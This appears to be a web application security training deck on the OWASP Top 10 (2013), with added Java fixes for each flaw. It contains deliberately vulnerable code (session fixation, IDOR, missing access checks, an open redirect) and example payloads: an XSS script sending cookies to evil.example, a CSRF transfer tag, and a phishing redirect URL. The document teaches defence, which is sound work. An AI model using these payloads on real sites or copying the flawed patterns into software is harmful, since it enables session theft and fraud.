2. SCHEDULE FOR THE DAY
1. Why are we here?
2. Real Life Examples
3. OWASP Top 10 (2013)
4. Demo Web Hacking Simulation Walkthrough
5. Summary
6. Questions
3. DO WE NEED WEB APP. SECURITY?
Well-managed infrastructure
Important data on web applications
Malware spreading
20. A2 – SESSION FIXATION EXAMPLE
public class LoginServlet extends HttpServlet {
…
public void doPost(HttpServletRequest request,
HttpServletResponse response) {
String user = request.getParameter("user");
String pass = request.getParameter("password");
…
// Flaw: the session the browser arrived with is kept across login.
// If an attacker fixed its identifier beforehand (for example by
// planting the cookie), they now share the authenticated session.
HttpSession session = request.getSession(true);
…
}
…
}
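The hardened form of the servlet above, as an added example that is not part of the original slides: the pre-login session is invalidated and a fresh identifier is issued only after the credentials check out. The `Authenticator.check(user, pass)` call and the `/home` landing page are assumptions standing in for the step the slide elides.

```java
import java.io.IOException;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

public class LoginServlet extends HttpServlet {

    @Override
    public void doPost(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        String user = request.getParameter("user");
        String pass = request.getParameter("password");

        // Hypothetical credential check (the slide elides this step).
        if (!Authenticator.check(user, pass)) {
            response.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }

        // Whatever session the browser arrived with is discarded: an attacker
        // who planted a JSESSIONID cookie before login must not share the
        // session that is about to become authenticated.
        HttpSession old = request.getSession(false);
        if (old != null) {
            old.invalidate();
        }
        // Only now is a session created; it carries a new identifier that the
        // attacker never saw.
        HttpSession session = request.getSession(true);
        session.setAttribute("user", user);

        // Servlet 3.1+ can instead keep the attributes and rotate only the id:
        // request.changeSessionId();

        response.sendRedirect(request.getContextPath() + "/home");
    }
}
```

Rotating the identifier at every privilege change (login, role switch, re-authentication) is the general rule; the invalidate-then-create pattern works on any servlet version, while `changeSessionId()` avoids losing attributes such as a shopping cart.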
22. A3 – CROSS-SITE SCRIPTING (XSS)
Untrusted data is sent to the victim's browser without validation
and/or output escaping.
XSS lets an attacker execute script in the victim's browser to:
hijack the user's session,
redirect the user to a malicious site,
…
1. Reflected XSS (the payload is echoed back from the current request)
2. Stored XSS (the payload is saved server-side and served to later visitors)
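An added example (not from the original slides) of the escaping the slide refers to: a reflected search parameter is written into the page first verbatim and then through a small HTML escaper. The parameter name `q` and the payload are constructed for the demonstration.

```java
public final class HtmlEscaper {

    // Escape untrusted text for the HTML body or a quoted attribute value.
    // Every character that can start a tag, an entity or close a quote is
    // replaced by its entity, so the browser renders it as text only.
    public static String escapeHtml(String untrusted) {
        if (untrusted == null) return "";
        StringBuilder out = new StringBuilder(untrusted.length() + 16);
        for (int i = 0; i < untrusted.length(); i++) {
            char c = untrusted.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#x27;"); break;
                case '/':  out.append("&#x2F;"); break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed reflected-XSS payload, e.g. the value of a "q" parameter
        // in http://site/search?q=...
        String q = "<script>new Image().src='http://evil.example/?c='+document.cookie</script>";

        // Vulnerable: the parameter is concatenated into the page unchanged,
        // so the browser executes the script and the session cookie leaks.
        String vulnerable = "<p>Results for: " + q + "</p>";

        // Fixed: the same value escaped for the HTML body context.
        String fixed = "<p>Results for: " + escapeHtml(q) + "</p>";

        System.out.println(vulnerable);
        System.out.println(fixed);
    }
}
```

Escaping is context-specific: this escaper is correct for HTML body and quoted attribute values, but a value placed inside a `<script>` block, a URL, or a CSS property needs the encoding rules of that context instead, and a templating engine that escapes by default is preferable to calling a helper by hand.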
26. A4 – INSECURE DIRECT OBJECT REF.
A reference to an internal object such as a
file,
directory,
database key
is exposed without
an access control check, or
any other protection.
27. A4 – DIRECT OBJECT REF. EXAMPLE
// The parameter is bound, so there is no SQL injection here, but the
// "account" value alone decides which row is returned: nothing ties it
// to the logged-in user.
String query = "select * from accounts where account = ?";
PreparedStatement stmt = conn.prepareStatement(query);
stmt.setString(1, request.getParameter("account"));
ResultSet rs = stmt.executeQuery();
28. A4 – DIRECT OBJECT REF. EXAMPLE
The attacker simply changes the parameter to someone else's account:
http://foo.com/app/accountInfo?account=notmyaccount
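The same query with the missing ownership check, as an added example that is not from the original slides. It assumes an `owner_id` column on `accounts` and that `currentUserId` is taken from the server-side session; the `Account` record and the `balance_cents` column are constructed for the example.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.Optional;

public final class AccountInfo {

    // Minimal account row, constructed for the example.
    public record Account(String number, long ownerId, long balanceCents) {}

    // Returns the requested account only if it belongs to the authenticated
    // user. currentUserId must come from the session, never from the URL.
    public static Optional<Account> loadOwnAccount(Connection conn,
                                                   String requestedAccount,
                                                   long currentUserId) throws SQLException {
        // The bound parameter still prevents SQL injection; the additional
        // owner_id predicate (assumed column) is what prevents IDOR.
        String query = "select account, owner_id, balance_cents "
                     + "from accounts where account = ? and owner_id = ?";
        try (PreparedStatement stmt = conn.prepareStatement(query)) {
            stmt.setString(1, requestedAccount);
            stmt.setLong(2, currentUserId);
            try (ResultSet rs = stmt.executeQuery()) {
                if (!rs.next()) {
                    // "Does not exist" and "not yours" look identical to the
                    // caller, so the response does not confirm that
                    // notmyaccount is a valid account number.
                    return Optional.empty();
                }
                return Optional.of(new Account(rs.getString("account"),
                                               rs.getLong("owner_id"),
                                               rs.getLong("balance_cents")));
            }
        }
    }
}
```

The alternative the OWASP guidance mentions is an indirect reference: the page lists the user's accounts as 1, 2, 3 and a per-session map translates those back to real account numbers, so a value that was never handed out cannot be requested at all. Either way the decision is made on the server from session state, not from the parameter.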
29. A5 – SECURITY MISCONFIGURATION
A secure configuration must be defined, deployed and maintained for the:
application,
frameworks,
application server,
web server,
database server,
platform.
33. A6 – SENSITIVE DATA EXPOSURE
Protect sensitive data such as
credit cards,
authentication credentials,
…
Apply extra protection (encryption at rest and in transit) and take
precautions when the data is exchanged with the browser.
34. A6 – DATA EXPOSURE EXAMPLE 1
An application encrypts credit card numbers in a database
using automatic (transparent) database encryption.
However, this means the database also decrypts the data
automatically when it is retrieved, so an SQL injection
flaw can read credit card numbers in clear text.
35. A6 – DATA EXPOSURE EXAMPLE 2
A site simply doesn't use SSL/TLS for all authenticated pages.
An attacker who can monitor network traffic (for example on an open
wireless network) steals the user's session cookie.
36. A7 – MISSING FUNCTION LEVEL ACCESS CONTROL
Function level access is typically verified:
before making functionality visible in the GUI ✓
on the server when each function is actually invoked ✗
Hiding a button or menu entry is not access control: the function
must be checked again every time it is called.
37. A7 – ACCESS CONTROL EXAMPLE
@Stateless
public class OrderBean implements Order {
public String getDetail(String id) {
…
}
// Flaw: approve() carries no role restriction, so any caller who can
// reach the bean can approve an order, whether or not the GUI ever
// showed them an "approve" button.
public String approve(String id) {
…
}
…
}
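The bean above with the missing checks added, as an added example that is not from the original slides. It combines the container's declarative `@RolesAllowed` check with a programmatic ownership check; the `OrderRepository`, `OrderRecord` and the role names `customer` and `manager` are assumptions.

```java
import javax.annotation.Resource;
import javax.annotation.security.RolesAllowed;
import javax.ejb.EJBAccessException;
import javax.ejb.SessionContext;
import javax.ejb.Stateless;

@Stateless
public class OrderBean implements Order {

    @Resource
    private SessionContext ctx;

    // Hypothetical repository; not part of the slide.
    private OrderRepository orders;

    // Declarative check: the container rejects callers outside these roles
    // before the method body runs, regardless of what the GUI showed them.
    @RolesAllowed({"customer", "manager"})
    public String getDetail(String id) {
        OrderRecord order = orders.load(id);
        // Programmatic check: a customer may only read their own orders,
        // which the role alone cannot express.
        String caller = ctx.getCallerPrincipal().getName();
        if (!ctx.isCallerInRole("manager") && !order.ownerIs(caller)) {
            throw new EJBAccessException("order " + id + " does not belong to " + caller);
        }
        return order.detail();
    }

    // Approval is a manager-only function. Hiding the button in the GUI
    // would not stop a customer from calling this method directly.
    @RolesAllowed("manager")
    public String approve(String id) {
        OrderRecord order = orders.load(id);
        order.markApproved(ctx.getCallerPrincipal().getName());
        orders.save(order);
        return order.detail();
    }
}
```

The role check belongs at the point where the function is executed (here the EJB), not only in the web tier that renders the page, so that every path to the function, including direct calls from a URL or a script, goes through it.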
39. A8 – CROSS-SITE REQUEST FORGERY
1. User authenticates to bank.com
2. User visits forum.com
3. The forum page contains the tag
<img src="bank.com/transfer.jsp?account=attacker&amount=300000">
4. The user's browser makes the GET request
bank.com/transfer.jsp?account=attacker&amount=300000
with the bank.com session cookie attached, without the user knowing
40. A8 – CSRF EXAMPLE
Nearly every state-changing request that is authenticated only by a
cookie the browser sends automatically is susceptible to CSRF, so there
is no bug to hunt: look for the absence of an anti-CSRF token instead …
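An added example (not from the original slides) of the token check that defeats the forged `<img>` request above: a random per-session token is embedded in the bank's own forms and compared in constant time on each transfer. The `transferAllowed` decision function, the method/token inputs and the printed cases are constructed for the example; a real servlet would read the session token from `HttpSession` and the submitted one from the form field.

```java
import static java.nio.charset.StandardCharsets.UTF_8;

import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;

public final class CsrfGuard {
    private static final SecureRandom RNG = new SecureRandom();

    // Issued once per session at login and stored as a session attribute;
    // the bank's pages embed it in every state-changing form:
    //   <input type="hidden" name="csrf" value="...">
    public static String issueToken() {
        byte[] raw = new byte[32];
        RNG.nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    // Constant-time comparison: a forged request carries no token, or a
    // guessed one, and is rejected without leaking how close the guess was.
    public static boolean tokenMatches(String sessionToken, String submitted) {
        if (sessionToken == null || submitted == null) return false;
        return MessageDigest.isEqual(sessionToken.getBytes(UTF_8),
                                     submitted.getBytes(UTF_8));
    }

    // Decision for transfer.jsp: state changes only via POST, and only with
    // the session's token echoed back. The <img> tag on forum.com produces a
    // GET with no token, so it fails both conditions; forum.com cannot read
    // the token because it lives in bank.com's page and session.
    public static boolean transferAllowed(String method, String sessionToken, String submitted) {
        return "POST".equals(method) && tokenMatches(sessionToken, submitted);
    }

    public static void main(String[] args) {
        String token = issueToken();   // stored in the session at login
        System.out.println("legitimate form post : " + transferAllowed("POST", token, token));
        System.out.println("forged <img> GET     : " + transferAllowed("GET", token, null));
        System.out.println("forged POST, no token: " + transferAllowed("POST", token, "guess"));
    }
}
```

Note that the slide's transfer is triggered by a GET; moving state changes to POST is necessary but not sufficient, since a hidden auto-submitting form on forum.com can POST just as easily. The token is what the attacker's page cannot supply.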
41. A9 – USING COMPONENTS WITH KNOWN VULNERABILITIES
Check the versions of libraries and frameworks in use against the
Common Vulnerabilities and Exposures database (https://cve.mitre.org)
42. A10 – UNVALIDATED REDIRECT
1. Lure the user into clicking a redirect link
http://www.trusted.com/redirector?to=http://www.evil.com
2. The code does not perform any validation on the target
String location = request.getParameter("to");
response.sendRedirect(location);
3. The user thinks (s)he is accessing trusted.com but is in fact
at evil.com
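An added example (not from the original slides) of validating the `to` parameter before calling `sendRedirect`: only site-relative paths and absolute HTTPS URLs whose host is on an allow-list pass; everything else falls back to the home page. The allow-list containing `www.trusted.com`, the fallback `/` and the sample inputs are constructed for the example.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Set;

public final class SafeRedirect {
    // Hosts the application may send users to (assumption for the example).
    private static final Set<String> ALLOWED_HOSTS = Set.of("www.trusted.com");
    private static final String FALLBACK = "/";

    // Returns a redirect target that is safe to pass to response.sendRedirect().
    public static String resolve(String to) {
        if (to == null || to.isEmpty()) return FALLBACK;
        URI uri;
        try {
            uri = new URI(to).normalize();   // rejects illegal characters, folds ../
        } catch (URISyntaxException e) {
            return FALLBACK;
        }

        // Site-relative target: no scheme and no authority. "//evil.com" has an
        // authority (it is scheme-relative and would leave the site), so it
        // does not reach this branch.
        if (uri.getScheme() == null && uri.getAuthority() == null) {
            String path = uri.getPath();
            return (path != null && path.startsWith("/")) ? uri.toString() : FALLBACK;
        }

        // Absolute target: scheme must be https and the host on the allow-list.
        // "https://www.trusted.com@evil.com" parses with host evil.com and is
        // therefore refused.
        String host = uri.getHost();
        if ("https".equals(uri.getScheme()) && host != null
                && ALLOWED_HOSTS.contains(host.toLowerCase(Locale.ROOT))) {
            return uri.toString();
        }
        return FALLBACK;
    }

    public static void main(String[] args) {
        String[] samples = {
            "/account?tab=history",                // site-relative: allowed
            "https://www.trusted.com/login",       // allow-listed host: allowed
            "http://www.evil.com",                 // the slide's payload: fallback
            "//www.evil.com/phish",                // scheme-relative: fallback
            "https://www.trusted.com@evil.com/",   // userinfo trick: fallback
            "javascript:alert(1)",                 // non-http scheme: fallback
        };
        for (String s : samples) {
            System.out.println(s + "  ->  " + resolve(s));
        }
    }
}
```

Where the set of legitimate destinations is small, the stronger option is not to accept a URL at all: let `to` be a short key ("login", "help") that the server maps to the real URL, so no user-supplied address is ever redirected to.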
43. SUMMARY
LAYERS OF DEFENSE IN DEPTH
Policies, Procedures,
Awareness
Physical
Perimeter
Internal Network
Host
App
Data
44. AND NOW …
bWAPP
OWASP Top 10
CWE/SANS Top 25
Mitigations (SANS, OWASP Cheat Sheets, …)
Web Services (SOAP & REST)
Mobile
And more …
46. FOLLOW US ON …
nitroxis Nitroxis.BE
@Nitroxis_sprl
Nitroxis sprl
Training and Certification for
Information Security
Professionals
47. ADD DEPTH TO YOUR INFORMATION SYSTEM
Olivier Houyoux Technology Security Architect
Version 1.1
Date 28/11/2014
Mail Contact (at) nitroxis.be
Website www.nitroxis.be